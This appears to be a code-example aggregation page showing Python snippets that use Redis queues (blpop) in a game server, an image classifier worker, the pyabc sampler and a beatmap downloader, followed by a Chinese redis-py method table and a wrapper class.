            log.info('Creating components...')

            for entity_dict in snapshot['entities']:
                entity = self.get(entity_dict['id'])
                entity.attach_from_dict(entity_dict)

        return True

    def save_snapshot(self):
        log.info('Saving snapshot: %s' % self.snapshot_path)
        child_pid = os.fork()

        if not child_pid:
            f = tempfile.NamedTemporaryFile(delete=False)
            snapshot = self.snapshot_serializer.serialize({
                'entities': [e.to_dict() for e in self.all()]
            })
            # if self.config['persistence'].get('compressed'):
            #     snapshot = zlib.compress(snapshot)
            f.write(snapshot)
            f.close()
            shutil.move(f.name, self.snapshot_path)
            os._exit(os.EX_OK)

    def _import_subclasses(self, module_name, parent_class):
        module = importlib.import_module(module_name)
        return {
            cls.__name__: cls
            for name, cls in inspect.getmembers(module)
            if inspect.isclass(cls) and issubclass(cls, parent_class)
        }

    def load_modules(self):
        sys.path.append(self.world_path)

        self.components = self._import_subclasses(self.config['world']['components'], Component)
        self.modes = self._import_subclasses(self.config['world']['modes'], Mode)

        log.debug('Loaded %s component(s) and %s mode(s).' % (
            len(self.components), len(self.modes)
        ))

    def start(self):
        try:
            self.redis.ping()
        except ConnectionError as e:
            fatal("Redis error: %s" % e.message)

        self.running = True
        log.info('Listening.')

        # Clear any existing tick events
        self.redis.ltrim(self.tick_key, 0, 0)
        try:
            while self.running:
                self.process_one_event()
        except Exception as e:
            log.critical(traceback.format_exc())
        except BaseException as e:
            pass
        finally:
            self.save_snapshot()

    def stop(self):
        self.running = False

    def start_ticker(self):
        log.info('Ticking every %ss.' % self.tick_interval)
        tock = False
        while True:
            log.debug('Tock.' if tock else 'Tick.')
            # TODO: timestamp here instead of True, for debugging?
            self.redis.rpush(self.tick_key, True)
            sleep(self.tick_interval)
            tock = not tock

    def send_message(self, entity_id, message):
        self.redis.publish(self.messages_key(entity_id), message)

    def listen(self, entity_id):
        subscription = self.subscribe(entity_id)
        for message in subscription.listen():
            yield message['data']

    # TODO: Leaky abstraction :\
    def subscribe(self, entity_id):
        subscription = self.redis.pubsub(ignore_subscribe_messages=True)
        subscription.subscribe(self.messages_key(entity_id))
        return subscription

    def process_one_event(self):
        key, value = self.redis.blpop([self.tick_key, self.incoming_key])

        if key == self.tick_key:
            self.perform_tick()
        else:
            entity_id, _, command = value.partition(' ')
            self.perform_command(int(entity_id), command)

    def enqueue_command(self, entity_id, command):
        self.redis.rpush(self.incoming_key, ' '.join([str(entity_id), command]))

    def perform_command(self, entity_id, command):
        entity = self.get(entity_id)
        log.debug('Processing: [%s] %s' % (entity.id, command))
        entity.perform(command)

    def perform_tick(self):
        for entity in self.ticking_entities:
            # TODO: Somehow iterate over only ticking components
            for component in entity.components:
                if component.ticking:
                    component.tick()

    # Entity helpers

    def get(self, id):
        return self.entities.get(id)

    def all(self):
        return self.entities.values()

    def find(self, component_name):
        if inspect.isclass(component_name):
            component_name = component_name.__name__
        return self.entities_by_component_name.get(component_name, set())

    def spawn(self, components=[], **kwargs):
        entity = Entity(**kwargs)
        self.add(entity)
        if components:
            entity.components.add(components)
        return entity

    def clone(self, entity):
        # TODO FIXME: This is fairly awful
        return Entity.from_dict(entity.to_dict(), self)

    def destroy(self, entity):
        entity.components.purge()
        self.remove(entity)

    def add(self, entity):
        entity.id = self.next_id()
        entity.zone = self
        self.entities[entity.id] = entity

    def remove(self, entity):
        self.entities.pop(entity.id)
        entity.zone = None
Beispiel #24
0
    for i in range(5):
        pred_result.append({
            'label': predictions[i][1],
            'score': ("%.4f" % predictions[i][0])
        })
    return pred_result


if __name__ == '__main__':
    queue = StrictRedis(host='localhost', port=6379)
    model = models.inception_v3(pretrained=True)
    model.transform_input = True

    while True:
        ##receive msg
        data = queue.blpop("image")
        json_dict = data[1].decode('utf-8')
        data_dict = json.loads(json_dict)
        URL = data_dict['url']
        timestamp = data_dict['timestamp']

        ##decode the image data
        encoded_image_str = data_dict['image']
        encoded_image = encoded_image_str.encode('utf-8')
        img_data = base64.b64decode(encoded_image)
        with open('img.png', 'wb') as outfile:
            outfile.write(img_data)

        ##feed the image to preloaded V3 model to generate prediction
        image = Image.open('img.png')
        pred_result = pred(image)
Beispiel #25
0
class RedisEvalParallelSampler(Sampler):
    """
    Redis based low latency sampler.
    This sampler is well performing in distributed environments.
    It is usually faster than the
    :class:`pyabc.sampler.DaskDistributedSampler` for
    short model evaluation runtimes. The longer the model evaluation times,
    the less the advantage becomes. It requires a running Redis server as
    broker.

    This sampler requires workers to be started via the command
    ``abc-redis-worker``.
    An example call might look like
    ``abc-redis-worker --host=123.456.789.123 --runtime=2h``
    to connect to a Redis server on IP ``123.456.789.123`` and to terminate
    the worker after finishing the first population which ends after 2 hours
    since worker start. So the actual runtime might be longer than 2h.
    See ``abc-redis-worker --help`` for its options.

    Use the command ``abc-redis-manager`` to retrieve info and stop the running
    workers.

    Start as many workers as you wish. Workers can be dynamically added
    during the ABC run.

    Parameters
    ----------

    host: str, optional
        IP address or name of the Redis server.
        Default is "localhost"

    port: int, optional
        Port of the Redis server.
        Default if 6379.
    """
    def __init__(self, host="localhost", port=6379):
        super().__init__()
        worker_logger.debug("Redis sampler: host={} port={}".format(
            host, port))
        self.redis = StrictRedis(host=host, port=port)

    def sample_until_n_accepted(self, sample_one, simulate_one, accept_one, n):
        self.redis.set(
            SSA, cloudpickle.dumps((sample_one, simulate_one, accept_one)))
        self.redis.set(N_EVAL, 0)
        self.redis.set(N_PARTICLES, n)
        self.redis.set(N_WORKER, 0)
        self.redis.delete(QUEUE)

        id_results = []

        self.redis.publish(MSG, START)

        while len(id_results) < n:
            dump = self.redis.blpop(QUEUE)[1]
            particle_with_id = pickle.loads(dump)
            id_results.append(particle_with_id)

        while int(self.redis.get(N_WORKER).decode()) > 0:
            sleep(SLEEP_TIME)

        # make sure all results are collected
        while self.redis.llen(QUEUE) > 0:
            id_results.append(pickle.loads(self.redis.blpop(QUEUE)[1]))

        self.nr_evaluations_ = int(self.redis.get(N_EVAL).decode())

        self.redis.delete(SSA)
        self.redis.delete(N_EVAL)
        self.redis.delete(N_PARTICLES)
        # avoid bias toward short running evaluations
        id_results.sort(key=lambda x: x[0])
        id_results = id_results[:n]

        population = [res[1] for res in id_results]
        return population
Beispiel #26
0
class BeatmapDaemon:
    def __init__(self):
        self.crawler = BeatmapCrawler(OSU_ACCOUNT['username'], OSU_ACCOUNT['password'])
        handlers = []
        for SERVER in SERVERS:
            handler_class = SERVER['handler']
            handler = handler_class(DownloadServer.objects.get(pk=SERVER['server_id']), SERVER['config'])
            handler.init()
            handlers.append(handler)
        self.handlers = tuple(handlers)
        self.redis = None
        self.logger = logging.getLogger('osubeatmaps.daemon')
        """:type : logging.RootLogger """

    def ensure_beatmap(self, beatmap_id):
        try:
            beatmap = Beatmap.objects.get(pk=beatmap_id)
        except Beatmap.DoesNotExist:
            beatmap = self.crawler.crawl_single(beatmap_id)
            beatmap.save()
        return beatmap

    def check_all(self):
        for handler in self.handlers:
            downloads = handler.check_all()
            for download in downloads:
                beatmap = self.ensure_beatmap(download.beatmap_id)
                try:
                    Download.objects.get(server_id=handler.server.id, beatmap_id=beatmap.id)
                except Download.DoesNotExist:
                    download.save()

    def process_single(self, beatmap_id):
        """

        :param beatmap_id:
        :return: timestamp of finishing downloading
        """
        self.crawler.ensure_login()
        self.crawler.crawl_single(beatmap_id).save()
        p = self.crawler.download_beatmap(beatmap_id)
        tmp = tempfile.mkstemp()
        os.close(tmp[0])
        tmp_filename = tmp[1]
        tmp_file = open(tmp_filename, 'wb')
        shutil.copyfileobj(p[1], tmp_file)
        tmp_file.close()
        p[1].close()
        # record the finishing time.
        ret = time.time()
        threads = []
        """:type : list of Thread """
        # invoke each handler
        for handler in self.handlers:
            def handle():
                _tmp_file = open(tmp_filename, 'rb')
                handler.upload(p[0], _tmp_file).save()
                _tmp_file.close()

            thread = Thread(None, handle)
            threads.append(thread)
        for thread in threads:
            thread.start()
        for thread in threads:
            thread.join()
        # remove downloaded file
        os.unlink(tmp_filename)
        # return the timestamp indicating download finishing time.
        return ret

    # noinspection PyBroadException
    def run_daemon(self):
        self.logger.info("Starting beatmap daemon.")
        self.redis = StrictRedis()
        while True:
            try:
                beatmap_id = int(self.redis.blpop(FETCH_QUEUE_KEY)[1])
                self.logger.info('Now processing beatmap #%d.', beatmap_id)
                try:
                    django.db.close_old_connections()
                    stamp = self.process_single(beatmap_id)
                    self.logger.info('Finished processing beatmap #%d.', beatmap_id)
                    delta_time = time.time() - stamp
                    if delta_time < DOWNLOAD_SLEEP_TIME:
                        time.sleep(DOWNLOAD_SLEEP_TIME - delta_time)
                except Exception as e:
                    self.logger.exception("An exception raised while processing beatmap #%d. Aborting.", beatmap_id)

            except KeyboardInterrupt:
                self.logger.info("stopping beatmap daemon.")
                quit()
            except Exception as e:
                self.logger.exception("An exception raised while processing crawling queue.")
                self.logger.critical("Error whiling processing crawling queue.")
flushdb()	        删除当前选择数据库中的所有key  flushdb()	                         True
flushall()	        删除所有数据库中的所有key	  flushall()	                        True

\List操作
        方法	                        作用	                                                    示例	                  示例结果
rpush(name, *values)	    在key为name的list尾添加值为value的元素,可以传多个	                redis.rpush('list', 1, 2, 3)	 3,list大小
lpush(name, *values)	    在key为name的list头添加值为value的元素,可以传多个	                redis.lpush('list', 0)	         4,list大小
llen(name)	                返回key为name的list的长度	                                     redis.llen('list')	              4
lrange(name, start, end)    返回key为name的list中start至end之间的元素	                      redis.lrange('list', 1, 3)	   [b'3', b'2', b'1']
ltrim(name, start, end)	    截取key为name的list,保留索引为start到end的内容	                   ltrim('list', 1, 3)	            True
lindex(name, index)	        返回key为name的list中index位置的元素	                          redis.lindex('list', 1)	       b'2'
lset(name, index, value)    给key为name的list中index位置的元素赋值,越界则报错	                redis.lset('list', 1, 5)	     True
lrem(name, count, value)    删除count个key的list中值为value的元素	                          redis.lrem('list', 2, 3)	       1,即删除的个数
lpop(name)	                返回并删除key为name的list中的首元素	                               redis.lpop('list')	            b'5'
rpop(name)	                返回并删除key为name的list中的尾元素	                               redis.rpop('list')	            b'2'
blpop(keys, timeout=0)	    返回并删除名称为在keys中的list中的首元素,如果list为空,则会一直阻塞等待 redis.blpop('list')	          [b'5']
brpop(keys, timeout=0)	    返回并删除key为name的list中的尾元素,如果list为空,则会一直阻塞等待	    redis.brpop('list')	             [b'2']
rpoplpush(src, dst)	        返回并删除名称为src的list的尾元素,并将该元素添加到名称为dst的list的头部 redis.rpoplpush('list', 'list2')  b'2'

\Set操作
        方法	                            作用	                            示例	                                            示例结果
sadd(name, *values)	            向key为name的set中添加元素	                  redis.sadd('tags', 'Book', 'Tea', 'Coffee')	    3,即插入的数据个数
srem(name, *values)	            从key为name的set中删除元素	                  redis.srem('tags', 'Book')	                    1,即删除的数据个数
spop(name)	                    随机返回并删除key为name的set中一个元素	        redis.spop('tags')	                                    b'Tea'
smove(src, dst, value)	        从src对应的set中移除元素并添加到dst对应的set中	 redis.smove('tags', 'tags2', 'Coffee')	                  True
scard(name)	                    返回key为name的set的元素个数	              redis.scard('tags')	                                     3
sismember(name, value)	        测试member是否是key为name的set的元素	       redis.sismember('tags', 'Book')	                        True
sinter(keys, *args)	            返回所有给定key的set的交集	                   redis.sinter(['tags', 'tags2'])	                    {b'Coffee'}
sinterstore(dest, keys, *args)	求交集并将交集保存到dest的集合	                redis.sinterstore('inttag', ['tags', 'tags2'])	          1
sunion(keys, *args)	            返回所有给定key的set的并集	                   redis.sunion(['tags', 'tags2'])	                {b'Coffee', b'Book', b'Pen'}
sunionstore(dest, keys, *args)	求并集并将并集保存到dest的集合	                redis.sunionstore('inttag', ['tags', 'tags2'])	          3
Beispiel #28
0
class RedisConn(object):
    """docstring for RedisConn"""

    def __init__(self, startup_nodes=None, host="localhost",
                 port=6379, db=0, password=None, encoding='utf-8',
                 socket_keepalive=False, connection_pool=None,
                 max_connections=None, project="", decode_responses=True, **kwargs):
        if project:
            project = f'{project}:'
        self.cluster_flag = False
        self.project = project
        if startup_nodes:
            from rediscluster import StrictRedisCluster
            if isinstance(startup_nodes, (str, bytes)):
                startup_nodes = _normalize_startup_nodes(startup_nodes)
            self._redis = StrictRedisCluster(startup_nodes=startup_nodes, decode_responses=decode_responses,
                                             skip_full_coverage_check=True, **kwargs)
            self.cluster_flag = True
        else:
            self._redis = StrictRedis(host=host, port=port, db=db, password=password,
                                      socket_keepalive=socket_keepalive, connection_pool=connection_pool,
                                      max_connections=max_connections, **kwargs)

    def add_head(self, key):
        return f'{self.project}{key}'

    def format_key():
        def make_wrapper(func):
            def wrapper(self, key, *args, **kwargs):
                new_key = self.add_head(key)
                return func(self, new_key, *args, **kwargs)
            return wrapper
        return make_wrapper

    def format_key_keys():
        def make_wrapper(func):
            def wrapper(self, key, keys, *args, **kwargs):
                new_key = self.add_head(key)
                new_keys = list(map(self.add_head, keys))
                return func(self, new_key, new_keys, *args, **kwargs)
            return wrapper
        return make_wrapper

    def format_args():
        def make_wrapper(func):
            def wrapper(self, *args, **kwargs):
                new_args = list(map(self.add_head, list(args)))
                return func(self, *new_args, **kwargs)
            return wrapper
        return make_wrapper

    def format_two_key():
        def make_wrapper(func):
            def wrapper(self, src, dst, *args, **kwargs):
                new_src = self.add_head(src)
                new_dst = self.add_head(dst)
                return func(self, new_src, new_dst, *args, **kwargs)
            return wrapper
        return make_wrapper

    def format_keys():
        def make_wrapper(func):
            def wrapper(self, keys, *args):
                new_keys = list(map(self.add_head, keys))
                return func(self, new_keys, *args)
            return wrapper
        return make_wrapper

    def format_dicts():
        def make_wrapper(func):
            def wrapper(self, mapping, *args):
                new_mapping = {}
                for key in mapping.keys():
                    new_key = self.add_head(key)
                    new_mapping[new_key] = mapping[key]
                return func(self, new_mapping, *args)
            return wrapper
        return make_wrapper

    @format_args()
    def unlink(self, *keys):
        """
        time complexity O(1)
        redis异步删除keys
        """
        return self._redis.unlink(*keys)

    def pipeline(self, transaction=True, shard_hint=None):
        """
        返回一个pipe对象
        """
        return self._redis.pipeline(transaction, shard_hint)

    """===============================string-start=========================="""
    # }
    @format_key()
    def set(self, key, value, ex=None, px=None, nx=False, xx=False):
        """
        time complexity O(1)
        Set the value at key ``key`` to ``value``
        Arguments:
            key (str):     key key
            value (str):    key value
            ex(int):    过期时间(秒)
            px(int):    过期时间(豪秒)
            nx(bool):   如果设置为True,则只有key不存在时,当前set操作才执行(新建)
            xx(bool):   如果设置为True,则只有key存在时,当前set操作才执行 (修改)
        Returns:
            result(bool): 是否成功成功是True失败可能是None
        """
        return self._redis.set(key, value, ex, px, nx, xx)

    @format_key()
    def get(self, key):
        """
        time complexity O(1)
        Return the value at ``key``, or None if the key doesn't exist
        Arguments:
            key (str):     key
        Returns:
            value (str):返回value
        """
        return self._redis.get(key)

    @format_key()
    def getset(self, key, value):
        """
        time complexity O(1)
        设置新值并获取原来的值
        """
        return self._redis.getset(key, value)

    @format_key()
    def strlen(self, key):
        """
        time complexity O(1)
        获得key对应的value长度
        """
        return self._redis.strlen(key)

    @format_key()
    def getrange(self, key, start, end):
        """
        time complexity O(1)
        获得key对应的value的start到end长度字符返回
        """
        return self._redis.getrange(key, start, end)

    @format_key()
    def setrange(self, key, offset, value):
        """
        time complexity O(1)
        设置key对应的value从offset地方用新value替换
        """
        return self._redis.setrange(key, offset, value)

    @format_key()
    def setbit(self, key, offset, value):
        """
        time complexity O(1)
        value值只能是1或0
        设置key对应的value二进制在offset位用value替换
        """
        return self._redis.setbit(key, offset, value)

    @format_key()
    def getbit(self, key, offset):
        """
        time complexity O(1)
        获取key对应的value二进制在offset位的值
        """
        return self._redis.getbit(key, offset)

    @format_key()
    def expire(self, key, time):
        """
        time complexity O(1)
        设置key的过期时间s
        """
        return self._redis.expire(key, time)

    @format_key()
    def pexpire(self, key, time):
        """
        time complexity O(1)
        设置key的过期时间ms
        """
        return self._redis.pexpire(key, time)

    @format_key()
    def pexpireat(self, key, when):
        """
        time complexity O(1)
        设置key的过期时间(在什么时候过期)
        when是uninx的时间戳ms
        """
        return self._redis.pexpireat(key, when)

    @format_key()
    def pttl(self, key):
        """
        time complexity O(1)
        获得key过期时间(ms),没有设置过期时间返回-1
        """
        return self._redis.pttl(key)

    @format_key()
    def ttl(self, key):
        """
        time complexity O(1)
        获得name过期时间(s),没有设置过期时间返回-1
        """
        return self._redis.ttl(key)

    @format_dicts()
    def mset(self, mapping):
        """
        time complexity O(n)
        Arguments:
            mapping (dict):   {name: value,name1: value1}
        Returns:
            return ok
        """
        return self._redis.mset(mapping)

    @format_dicts()
    def msetnx(self, mapping):
        """
        time complexity O(n)
        Arguments:
            mapping (dict):   {name: value,name1: value1}
        Returns:
            return (bool): 与mset区别是指定的key中有任意一个已存在,则不进行任何操作,返回错误
        """
        return self._redis.msetnx(mapping)

    @format_keys()
    def mget(self, keys, *args):
        """
        time complexity O(n)
        Arguments:
            keys (list): [name, name1]
        Returns:
            return (list): 返回对应keys的value, name在数据库不存在返回None
        Mind!:
            一次性取多个key确实比get提高了性能,但是mget的时间复杂度O(n),
            实际使用过程中测试当key的数量到大于100之后性能会急剧下降,
            建议mget每次key数量不要超过100。在使用前根据实列的redis吞吐量可能会不一样。
        """
        return self._redis.mget(keys, *args)

    @format_key()
    def incr(self, key, amount=1):
        """
        time complexity O(1)
        将key对应的value值自增amount,并返回自增后的值。只对可以转换为整型的String数据起作用。
        用于统计sql型数据库大表里面的数据量
        """
        return self._redis.incr(key, amount)

    @format_key()
    def incrbyfloat(self, key, amount=1.0):
        """
        time complexity O(1)
        amount 可以为负数代表减法
        将key对应的value值自增amount,并返回自增后的值。只对可以转换为float的String数据起作用。
        用于统计sql型数据库大表里面的数据量
        """
        return self._redis.incrbyfloat(key, amount)

    @format_key()
    def decr(self, key, amount=1):
        """
        time complexity O(1)
        将key对应的value值自减amount,并返回自减后的值。只对可以转换为整型的String数据起作用。
        用于统计sql型数据库大表里面的数据量
        """
        return self._redis.decr(key, amount)

    def keys(self, pattern='*'):
        """
        time complexity O(n)
        获取匹配pattern的所有key.实际项目中慎用
        """
        return self._redis.keys(pattern)

    @format_key()
    def move(self, key, db):
        """
        time complexity O(1)
        移动key到其他db
        """
        return self._redis.move(key, db)

    def randomkey(self):
        """
        time complexity O(1)
        随机返回一个key
        """
        return self._redis.randomkey()

    @format_args()
    def rename(self, src, dst):
        """
        time complexity O(1)
        重命名key src to dst
        """
        return self._redis.rename(src, dst)

    @format_args()
    def exists(self, *keys):
        """
        time complexity O(1)
        查看keys是否存在返回存在的key数量
        """
        return self._redis.exists(*keys)

    @format_args()
    def delete(self, *keys):
        """
        time complexity O(1)
        删除keys
        """
        return self._redis.delete(*keys)

    @format_key()
    def type(self, key):
        """
        time complexity O(1)
        查看key对应value类型
        """
        return self._redis.type(key)
# {
    """===============================string-end============================"""

    """===============================list-start============================"""
# }
    @format_keys()
    def blpop(self, keys, timeout=0):
        """
        如果keys里面有list为空要求整个服务器被阻塞以保证块执行时的原子性,
        该行为阻止了其他客户端执行 LPUSH 或 RPUSH 命令
        阻塞的一个命令,用来做轮询和会话配合使用
        Arguments:
            keys(list): [keys, keys]
            timeout(int): S
        """
        return self._redis.blpop(keys, timeout)

    @format_keys()
    def brpop(self, keys, timeout=0):
        """
        同上,取数据的方向不同
        """
        return self._redis.brpop(keys, timeout)

    @format_two_key()
    def brpoplpush(self, src, dst, timeout=0):
        """
        从src表尾取一个数据插入dst表头。同上src为空阻塞
        """
        return self._redis.brpoplpush(src, dst, timeout)

    @format_key()
    def lpush(self, key, *values):
        """
        time complexity O(n)
        Set the value at key ``key`` to ``value``
        Arguments:
            key (str):     key key
            value (list):    key value
        Returns:
            result(int): 插入成功之后list长度
        """
        return self._redis.lpush(key, *values)

    @format_key()
    def lpushx(self, key, *values):
        """
        time complexity O(n)
        only key not exists
        Arguments:
            key (str):     key
            value (list):    key value
        Returns:
            result(int): 插入成功之后list长度
        """
        return self._redis.lpushx(key, *values)

    @format_key()
    def lpop(self, key):
        """
        time complexity O(1)
        移除并返回列表 key 的头元素。
        """
        return self._redis.lpop(key)

    @format_key()
    def rpush(self, key, *values):
        """
        time complexity O(n)
        Set the value at key ``key`` to ``value``
        Arguments:
            key (str):     key key
            value (list):    key value
        Returns:
            result(int): 插入成功之后list长度
        """
        return self._redis.rpush(key, *values)

    @format_key()
    def rpushx(self, key, *values):
        """
        time complexity O(n)
        only key not exists
        Arguments:
            key (str):     key
            value (list):    key value
        Returns:
            result(int): 插入成功之后list长度
        """
        return self._redis.rpushx(key, *values)

    @format_key()
    def rpop(self, key):
        """
        time complexity O(1)
        移除并返回列表 key尾元素。
        """
        return self._redis.rpop(key)

    @format_key()
    def lrange(self, key, start, end):
        """
        time complexity O(n)
        获取list数据包含start,end.在不清楚list的情况下尽量不要使用lrange(key, 0, -1)操作
        应尽可能控制一次获取的元素数量
        """
        return self._redis.lrange(key, start, end)

    @format_args()
    def rpoplpush(self, src, dst):
        """
        从src表尾取一个数据插入dst表头
        """
        return self._redis.rpoplpush(src, dst)

    @format_key()
    def llen(self, key):
        """
        time complexity O(1)
        获取list长度,如果key不存在返回0,如果key不是list类型返回错误
        """
        return self._redis.llen(key)

    @format_key()
    def lindex(self, key, index):
        """
        time complexity O(n) n为经过的元素数量
        返回key对应list的index位置的value
        """
        return self._redis.lindex(key, index)

    @format_key()
    def linsert(self, key, where, refvalue, value):
        """
        time complexity O(n) n为经过的元素数量
        key或者refvalue不存在就不进行操作
        Arguments:
            where(str): BEFORE|AFTER  后|前
            refvalue(str): list里面的值
        """
        return self._redis.linsert(key, where, refvalue, value)

    @format_key()
    def lrem(self, key, count, value):
        """
        time complexity O(n)
        删除count数量的value
        Arguments:
            count(int): count>0 表头开始搜索
                        count<0 表尾开始搜索
                        count=0 删除所有与value相等的数值
        Returns:
            result(int): 删除的value的数量
        """
        if self.cluster_flag:
            return self._redis.lrem(key, value, count)
        return self._redis.lrem(key, count, value)

    @format_key()
    def lset(self, key, index, value):
        """
        time complexity O(n)
        设置list的index位置的值,没有key和超出返回错误
        """
        return self._redis.lset(key, index, value)

    @format_key()
    def ltrim(self, key, start, end):
        """
        time complexity O(n) n为被删除的元素数量
        裁剪让列表只保留指定区间内的元素,不在指定区间之内的元素都将被删除。
        """
        return self._redis.ltrim(key, start, end)

    @format_key()
    def sort(self, key, start=None, num=None, by=None, get=None,
             desc=False, alpha=False, store=None, groups=False):
        """
        time complexity O(n)
        O(N+M*log(M)), N 为要排序的列表或集合内的元素数量, M 为要返回的元素数量。
        删除count数量的value
        Arguments:
            by(str): 让排序按照外部条件排序,
                    可以先将权重插入redis然后再作为条件进行排序如(user_level_*)
            get(str): redis有一组user_name_*然后*是按照list里面的值,
                    按照排序取一个个key的value
            store(str): 保留sort之后的结果,可以设置expire过期时间作为结果缓存
            alpha: 按照字符排序
            desc: 逆序
        Returns:
            result(list): 排序之后的list
        """
        return self._redis.sort(key, start, num, by, get, desc, alpha, store, groups)

    def scan(self, cursor=0, match=None, count=None):
        """
        time complexity O(1) 单次
        增量迭代返回redis数据库里面的key,因为是增量迭代过程中返回可能会出现重复
        Arguments:
            cursor(int): 游标
            match(str): 匹配
            count(int): 每次返回的key数量
        Returns:
            result(set): 第一个是下次scan的游标,后面是返回的keys(list)当返回的游标为0代表遍历完整个redis
        """
        return self._redis.scan(cursor, match, count)
# {
    """===============================list-end===================================="""

    """===============================hash-start==================================="""
# }
    @format_key()
    def hdel(self, key, *names):
        """
        time complexity O(n) n为names长度
        Return the value at ``key``, or None if the key doesn't exist
        Arguments:
            key (str):     key
            names(list): hash里面的域
        Returns:
            result (int): 成功删除的个数
        """
        return self._redis.hdel(key, *names)

    @format_key()
    def hexists(self, key, name):
        """
        time complexity O(1)
        判断key中是否有name域
        """
        return self._redis.hexists(key, name)

    @format_key()
    def hget(self, key, name):
        """
        time complexity O(1)
        """
        return self._redis.hget(key, name)

    @format_key()
    def hgetall(self, key):
        """
        time complexity O(n)
        """
        return self._redis.hgetall(key)

    @format_key()
    def hincrby(self, key, name, amount=1):
        """
        time complexity O(1)
        amount可以为负数,且value值为整数才能使用否则返回错误
        """
        return self._redis.hincrby(key, name, amount)

    @format_key()
    def hincrbyfloat(self, key, name, amount=1.0):
        """
        time complexity O(1)
        """
        return self._redis.hincrbyfloat(key, name, amount)

    @format_key()
    def hkeys(self, key):
        """
        time complexity O(n)
        """
        return self._redis.hkeys(key)

    @format_key()
    def hlen(self, key):
        """
        time complexity O(1)
        """
        return self._redis.hlen(key)

    @format_key()
    def hset(self, key, name, value):
        """
        time complexity O(1)
        """
        return self._redis.hset(key, name, value)

    @format_key()
    def hsetnx(self, key, name, value):
        """
        time complexity O(1)
        """
        return self._redis.hsetnx(key, name, value)

    @format_key()
    def hmset(self, key, mapping):
        """
        time complexity O(n)
        """
        return self._redis.hmset(key, mapping)

    @format_key()
    def hmget(self, key, names, *args):
        """
        time complexity O(n)
        """
        return self._redis.hmget(key, names, *args)

    @format_key()
    def hvals(self, key):
        """
        time complexity O(n)
        返回hash表所有的value
        """
        return self._redis.hvals(key)

    @format_key()
    def hstrlen(self, key, name):
        """
        time complexity O(1)
        """
        return self._redis.hstrlen(key, name)
# {
    """=================================hash-end==================================="""

    """=================================set-start================================="""
# }
    @format_key()
    def sadd(self, key, *values):
        """
        time complexity O(n) n为values长度
        """
        return self._redis.sadd(key, *values)

    @format_key()
    def scard(self, key):
        """
        time complexity O(n) set长度
        返回set大小
        """
        return self._redis.scard(key)

    @format_args()
    def sdiff(self, key, *args):
        """
        time complexity O(n) N 是所有给定集合的成员数量之和
        返回差集成员的列表。
        """
        return self._redis.sdiff(key, *args)

    @format_args()
    def sdiffstore(self, dest, keys, *args):
        """
        time complexity O(n) N 是所有给定集合的成员数量之和
        返回差集成员的数量。并将结果保存到dest这个set里面
        """
        return self._redis.sdiffstore(dest, keys, *args)

    @format_args()
    def sinter(self, key, *args):
        """
        time complexity O(N * M), N 为给定集合当中基数最小的集合, M 为给定集合的个数。
        返回交集数据的list
        """
        return self._redis.sinter(key, *args)

    @format_args()
    def sinterstore(self, dest, keys, *args):
        """
        time complexity O(n) N 是所有给定集合的成员数量之和
        返回交集成员的数量。并将结果保存到dest这个set里面
        """
        return self._redis.sinterstore(dest, keys, *args)

    @format_key()
    def sismember(self, key, name):
        """
        time complexity O(1)
        判断name是否在key中
        """
        return self._redis.sismember(key, name)

    @format_key()
    def smembers(self, key):
        """
        time complexity O(n)
        返回set里面所有成员
        """
        return self._redis.smembers(key)

    @format_two_key()
    def smove(self, src, dst, value):
        """
        time complexity O(1)
        将value从src移动到dst原子性操作
        """
        return self._redis.smove(src, dst, value)

    @format_key()
    def spop(self, key, count=None):
        """
        time complexity O(n) n
        默认随机删除一条, 删除count条
        """
        return self._redis.spop(key, count)

    @format_key()
    def srandmember(self, key, number=None):
        """
        time complexity O(n) n
        默认随机返回一条, 返回number条
        """
        return self._redis.srandmember(key, number)

    @format_key()
    def srem(self, key, *values):
        """
        time complexity O(n) n为values长度
        移除key里面values
        """
        return self._redis.srem(key, *values)

    @format_args()
    def sunion(self, keys, *args):
        """
        time complexity O(N), N 是所有给定集合的成员数量之和
        返回并集
        """
        return self._redis.sunion(keys, *args)

    @format_args()
    def sunionstore(self, dest, keys, *args):
        """
        time complexity O(N), N 是所有给定集合的成员数量之和。
        求并集并保存
        """
        return self._redis.sunionstore(dest, keys, *args)

    @format_key()
    def sscan(self, key, cursor=0, match=None, count=None):
        """
        time complexity O(1)
        同scan只是这个是set使用
        """
        return self._redis.sscan(key, cursor, match, count)
# {
    """==================================set-end=================================="""

    """===============================SortedSet-start============================="""
# }
    @format_key()
    def zadd(self, key, mapping, nx=False, xx=False, ch=False, incr=False):
        """
        time complexity O(M*log(N)), N 是有序集的基数, M 为成功添加的新成员的数量。
        Arguments:
            mapping(dict): (value:score)
            XX(bool): 仅仅更新存在的成员,不添加新成员。
            NX(bool): 不更新存在的成员。只添加新成员。
            CH(bool): 修改返回值为发生变化的成员总数,原始是返回新添加成员的总数 (CH 是 changed 的意思)。
                      更改的元素是新添加的成员,已经存在的成员更新分数。 所以在命令中指定的成员有相同的分数将不被计算在内。
                      注:在通常情况下,ZADD返回值只计算新添加成员的数量。
            INCR(bool): 当ZADD指定这个选项时,成员的操作就等同ZINCRBY命令,对成员的分数进行递增操作。
        Returns:
            result(int): 成功插入数量
        """
        if self.cluster_flag:
            return self._redis.zadd(key, **mapping)
        return self._redis.zadd(key, mapping, nx, xx, ch, incr)

    @format_key()
    def zcard(self, key):
        """
        time complexity O(1)
        返回zset()基数
        """
        return self._redis.zcard(key)

    @format_key()
    def zcount(self, key, minz, maxz):
        """
        time complexity O(log(N)), N 为有序集的基数。
        返回score在min和max之间的value的个数
        """
        return self._redis.zcount(key, minz, maxz)

    @format_key()
    def zincrby(self, key, amount, value):
        """
        time complexity O(log(N)), N 为有序集的基数。
        amount 可以为负数
        """
        if self.cluster_flag:
            return self._redis.zincrby(key, value, amount)
        return self._redis.zincrby(key, amount, value)

    @format_key_keys()
    def zinterstore(self, dest, keys, aggregate=None):
        """
        time complexity O(N*K)+O(M*log(M)), N 为给定 key 中基数最小的有序集, K 为给定有序集的数量, M 为结果集的基数。
        求交集并按照aggregate做处理之后保存到dest。默认是求和
        Arguments:
            aggregate(str):sum 和, min 最小值, max 最大值
        返回新zset里面的value个数
        """
        return self._redis.zinterstore(dest, keys, aggregate)

    @format_key()
    def zrange(self, key, start, end, desc=False, withscores=False,
               score_cast_func=float):
        """
        time complexity O(log(N)+M), N 为有序集的基数,而 M 为结果集的基数。
        Arguments:
            start,有序集合索引起始位置(非分数)
            end,有序集合索引结束位置(非分数)
            desc,排序规则,默认按照分数从小到大排序
            withscores,是否获取元素的分数,默认只获取元素的值
            score_cast_func,对分数进行数据转换的函数
        """
